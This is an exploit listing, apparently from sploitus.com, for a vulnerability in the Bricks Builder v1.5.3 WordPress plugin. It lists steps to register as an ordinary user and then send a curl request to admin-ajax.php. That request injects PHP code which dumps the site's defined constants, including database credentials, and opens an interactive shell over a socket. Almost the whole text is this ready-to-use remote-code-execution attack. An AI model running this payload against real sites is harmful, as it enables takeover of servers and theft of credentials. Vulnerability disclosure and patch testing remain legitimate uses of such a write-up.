## https://sploitus.com/exploit?id=WPEX-ID:F7C5DD17-800F-42CD-A167-AF06CE183E3D
1. Start with a clean Wordpress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new Wordpress installations)
6. Send the following request to the server
curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Cookie: INSERT_COOKIES_HERE' \
--data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aaaaaa%22%2C%22name%22%3A%22code%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22code%22%3A%22%3C%3Fphp%20echo%20%27Pwned%21%20%3Cpre%3E%27%3B%20var%5Fdump%28get%5Fdefined%5Fconstants%28true%29%5B%27user%27%5D%29%3B%20echo%20%27%3C%2Fpre%3E%27%3B%20%24sock%3Dfsockopen%28%27127%2E0%2E0%2E1%27%2C11111%29%3B%20proc%5Fopen%28%27%2Fbin%2Fsh%20%2Di%27%2C%20array%280%3D%3E%24sock%2C%201%3D%3E%24sock%2C%202%3D%3E%24sock%29%2C%20%24pipes%29%3B%20%3F%3E%22%2C%22executeCode%22%3Atrue%7D%2C%22themeStyles%22%3A%5B%5D%7D%5D'
7. Open the page, the contents should be replaced with a message reading "Pwned", a dump of all PHP constants (e.g. database credentials) and a remote shell is opened to 127.0.0.1:11111